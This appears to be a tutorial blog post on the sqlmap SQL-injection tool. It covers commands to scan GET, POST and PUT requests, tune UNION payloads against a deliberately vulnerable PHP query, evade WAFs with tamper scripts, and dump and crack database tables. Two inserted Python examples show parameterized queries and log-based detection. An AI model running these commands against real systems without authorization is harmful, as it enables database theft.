Mastering SQLMap Tool for Effective SQL Injection Testing


Prasanna Acharya

sqlmap logo

SQLMap is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws.

SQL injection is a web vulnerability that allows attackers to interfere with the queries an application makes to its database. By injecting malicious SQL into input fields, attackers can bypass authentication; retrieve, modify, or delete database data; and even execute administrative operations on the database.

SQLMap supports the following SQL injection techniques (the letter in parentheses is the code used with the --technique option):

- Boolean-based blind (B): determines true/false conditions from changes in the web application's response
- Error-based (E): extracts information through database error messages
- Union query-based (U): retrieves data by combining the results of the legitimate query with those of an injected one using the UNION operator
- Stacked queries (S): executes multiple SQL statements in a single request to perform additional database actions
- Time-based blind (T): infers data by causing delays with time-based functions and measuring response times
- Inline queries (I): injects SQL into a subquery or expression inside the original query

On Debian-based Linux it can be installed with:

$ sudo apt install sqlmap

1. Basic listing

sqlmap -h

2. Advanced listing

sqlmap -hh

💡To Remember: Basic listing shows only the basic options and switches, sufficient in most cases while advanced listing shows all options.

3. Scan for SQLi vulnerabilities

Syntax:

sqlmap -u <target_URL>

OR, sqlmap <target_URL>

Example:

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Flags:

- -u : specifies the target URL
- --batch : skips SQLMap's interactive prompts by choosing the default answer automatically

💡To Remember: This command tests a GET request; the injectable parameter is in the query string.

Extra: To understand the --batch flag better, consider that SQLMap normally stops to ask Y/N questions during a test. With --batch the default answer is chosen for each prompt, so you do not have to answer them manually every time.

4. Testing for POST request

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Flag:

--data : specifies the POST request body data

💡To Remember: This command tests every parameter in the body for SQL injection. To test only one parameter that you suspect is vulnerable, mark the injection point with an asterisk (*) as in the command below:

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

5. Extracting data from a table

Example:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D "testdb" -T "users" --dump

Flags:

- -D : specifies the database
- -T : specifies the table
- --dump : dumps the contents of the specified table

Extra: If you do not know the database name, you can use only -T to specify the table to dump.

The GET and POST examples above cover the basic usage. Some other ways to specify requests are listed below.

1. Testing for PUT request

sqlmap -u example.com --data='id=1' --method PUT

Flags:

--method : specifies the HTTP method

2. Scanning with cookie header specification

sqlmap -u www.example.com --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Alternatively,

We can also pass the cookie with the -H flag, which adds an arbitrary header to the request:

sqlmap -u www.example.com -H 'Cookie: PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

💡To Remember: -H can be used to set any other request header in the same way.

3. Scanning with full HTTP request

If we need to specify a complex HTTP request with lots of different header values and an elongated POST body, we can use the -r flag.

sqlmap -r req.txt

💡To Remember: The req.txt file should contain the complete HTTP request, headers and body, copied from a request intercepted with a web proxy such as Burp.

🪄 Pro Tip: The request file can also carry a JSON body. An alternative to the request file:

Use "Copy as cURL" in the browser developer tools to copy the request as a curl command.

Browser Dev Tools (Mozilla Firefox)

Then replace curl with sqlmap at the start of the command, so that sqlmap sends the same request when testing for SQLi from the shell.

This could look like the following after replacing:

sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

Tuning SQLi attacks

Sometimes the default command does not give a result even though we suspect the target is vulnerable. In such cases we can tune the attack with additional options to make the injection succeed.

1. With prefix/suffix

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

💡To Remember: These flags add a prefix and a suffix around every payload SQLMap sends, so that the payload fits the quoting and parentheses of the original query.

Extra: To understand the command above, consider the following code:

$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);

With the prefix %')) and suffix -- -, the payload closes the open quote and parentheses and comments out the rest of the statement, which could make the query look like the following:

SELECT id,name,surname FROM users WHERE id LIKE (('test%')) UNION ALL SELECT 1,2,VERSION()-- -')) LIMIT 0,1
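To see why the prefix and suffix matter to the defender as well, here is an added Python example (not code from the article) that rebuilds the PHP snippet's string concatenation against a constructed in-memory SQLite table and contrasts it with a parameterized query. The table contents and the use of sqlite_version() in place of MySQL's VERSION() are assumptions made for the example.

```python
import sqlite3

# Added example, not code from the article. An in-memory SQLite table stands in for the
# "users" table behind the article's PHP snippet; the rows are constructed sample data.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id TEXT, name TEXT, surname TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("test1", "Ann", "Lee"), ("other", "Bob", "Ray")],
    )
    return con

# Same construction as the article's PHP: the raw ?q= value is glued into the SQL text,
# so the (( ')) wrapper and everything after it are under the caller's control.
def vulnerable_query(q):
    return "SELECT id,name,surname FROM users WHERE id LIKE (('" + q + "')) LIMIT 0,1"

def run_vulnerable(con, q):
    return con.execute(vulnerable_query(q)).fetchall()

# Hardened form: the value travels as a bound parameter. The database receives the query
# text and the value separately, so the input can never close the quote or add a UNION.
def run_parameterized(con, q):
    return con.execute(
        "SELECT id,name,surname FROM users WHERE id LIKE ? LIMIT 0,1", (q,)
    ).fetchall()

# The article's injected value with sqlmap's prefix "%'))" and suffix "-- -" already
# applied around the UNION payload. VERSION() is MySQL-specific, so this example uses
# SQLite's sqlite_version() in its place (an assumption for the example).
PAYLOAD = "test%')) UNION ALL SELECT 1,2,sqlite_version()-- -"

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_query(PAYLOAD))
    print("vulnerable:   ", run_vulnerable(con, PAYLOAD))
    print("parameterized:", run_parameterized(con, PAYLOAD))
```

With the concatenated query the input closes the quote and parentheses and appends a UNION, so the result contains a row that never existed in the table; with the bound parameter the same input is just an unmatched LIKE pattern and returns nothing. Parameterizing the query is the fix, whatever prefix or suffix an attacker tunes.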

2. With level/risk and verbosity

sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

Verbosity:

It increases the amount of information displayed. It is specified with -v flag. It ranges from 0 to 6 (default 1).

Level:

It defines the intensity and depth of the tests that SQLMap performs. It is specified with the --level flag. The level ranges from 1 to 5 (default 1).

Risk:

It makes the attack more aggressive, with the drawback of being more detectable by WAFs and IDS. It is specified with the --risk flag. The risk ranges from 1 to 3 (default 1).

Other tuning methods:

1. Status codes

If the difference between TRUE and FALSE responses can be seen in the HTTP status codes (e.g. 200 for TRUE and 500 for FALSE), the --code option can be used to fix the detection of TRUE responses to a specific HTTP code (e.g. --code=200).

2. Strings

This specifies a string that appears only in the TRUE response, e.g. --string=success

3. Techniques

This narrows the injection techniques used for testing, using the letter codes listed earlier in this article, e.g. --technique=BEU, which makes sqlmap perform only Boolean-based blind, error-based and union query-based tests.

4. UNION SQLi testing

Some flags:

- --union-cols=6: specifies the columns to test for the UNION SQLi query
- --union-from=users: specifies the table to use in the FROM <table> part of the UNION query (needed for databases such as Oracle)

Bypassing Web protections for the scan

Important flags:

- --skip-waf : Tries to bypass or avoid detection by Web Application Firewalls (WAFs) or Intrusion Prevention Systems (IPS) that might be protecting the target website.
- --tamper : Applies tamper scripts that modify (or obfuscate) the SQL injection payloads in order to bypass security mechanisms, e.g. --tamper=between,randomcase, where between replaces the greater-than operator (>) with NOT BETWEEN 0 AND # and the equals operator (=) with BETWEEN # AND #, and randomcase replaces each keyword character with a randomly cased one (e.g. SELECT -> SEleCt).

The full set of tamper scripts is in the tamper directory of the sqlmap repository.

Example Usage:

sqlmap -u "http://www.target.com/vuln.php?id=1" --tamper=between,randomcase
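From the defender's side, the tamper scripts named above leave traces that can be spotted in web-server logs. The following added Python example (not part of the article or of sqlmap) runs three simple checks over constructed Apache combined-format log lines: the mixed-case keywords produced by randomcase, the NOT BETWEEN 0 AND rewrite produced by between, and the self-identifying User-Agent that sqlmap sends by default unless the user overrides it with --user-agent or --random-agent. The log lines, addresses and version string are constructed sample data, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Added example, not sqlmap code. Constructed Apache combined-format access-log lines;
# the addresses, timestamps and the "sqlmap/1.8" version string are made up for the example.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/80.0"
198.51.100.7 - - [10/Oct/2024:13:55:37 +0000] "GET /vuln.php?id=1%20AND%201%20NOT%20BETWEEN%200%20AND%201 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/80.0"
198.51.100.7 - - [10/Oct/2024:13:55:38 +0000] "GET /vuln.php?id=1%20uNiOn%20aLl%20SeLeCt%201,2,3 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/80.0"
198.51.100.9 - - [10/Oct/2024:13:56:01 +0000] "GET /vuln.php?id=2 HTTP/1.1" 200 498 "-" "sqlmap/1.8 (https://sqlmap.org)"
"""

# Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Keywords whose case the randomcase tamper scrambles (e.g. SELECT -> SEleCt).
KEYWORD_RE = re.compile(r"\b(select|union|all|from|where|and|or)\b", re.I)
# Operator rewrite produced by the between tamper: "> x" becomes "NOT BETWEEN 0 AND x".
BETWEEN_RE = re.compile(r"\bNOT\s+BETWEEN\s+0\s+AND\b", re.I)

def reasons_for(path, ua):
    """Return the list of indicators found in one request; empty means nothing suspicious."""
    reasons = []
    if "sqlmap/" in ua.lower():
        reasons.append("sqlmap default User-Agent")
    decoded = unquote_plus(path)  # look at the query string as the application sees it
    if BETWEEN_RE.search(decoded):
        reasons.append("between-style operator rewrite")
    # A keyword that is neither all-upper nor all-lower is the randomcase signature.
    mixed = [m.group(0) for m in KEYWORD_RE.finditer(decoded)
             if m.group(0) not in (m.group(0).upper(), m.group(0).lower())]
    if mixed:
        reasons.append("mixed-case SQL keywords: " + ", ".join(mixed))
    return reasons

def analyze_log(text):
    """Parse each log line and return (ip, path, reasons) for the lines that trip a check."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = reasons_for(m.group("path"), m.group("ua"))
        if reasons:
            findings.append((m.group("ip"), m.group("path"), reasons))
    return findings

if __name__ == "__main__":
    for ip, path, reasons in analyze_log(SAMPLE_LOG):
        print(ip, path, "->", "; ".join(reasons))
```

The checks are deliberately narrow (a short keyword list, only the URL is inspected); a production rule would also inspect POST bodies and cookies, since the article shows sqlmap injecting into all three, and would correlate hits per source address rather than judging single lines.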

Enumerating database

After finding successful SQL injection in a URL, you can use the following flags to enumerate the database.

- --is-dba: checks whether the current database user has Database Administrator (DBA) privileges; if so, you have significant control over the database and can carry out high-level administrative tasks
- --schema: provides a complete view of the database schema
- --search : searches for databases, tables or columns by name, e.g. --search -T user searches for the table "user"; -D with a database name and -C with a column name can be used in the same way

Example Usage:

sqlmap -u "http://www.target.com/vuln.php?id=1" --search -T user

Extra: When dumping a users table with --dump, SQLMap also tries to crack the password hashes it finds among the dumped values.

That covers many of the handy techniques for using the SQLMap tool, so that we can test for SQL injection more efficiently.

Feel free to contact me for any queries or just to say Hello.
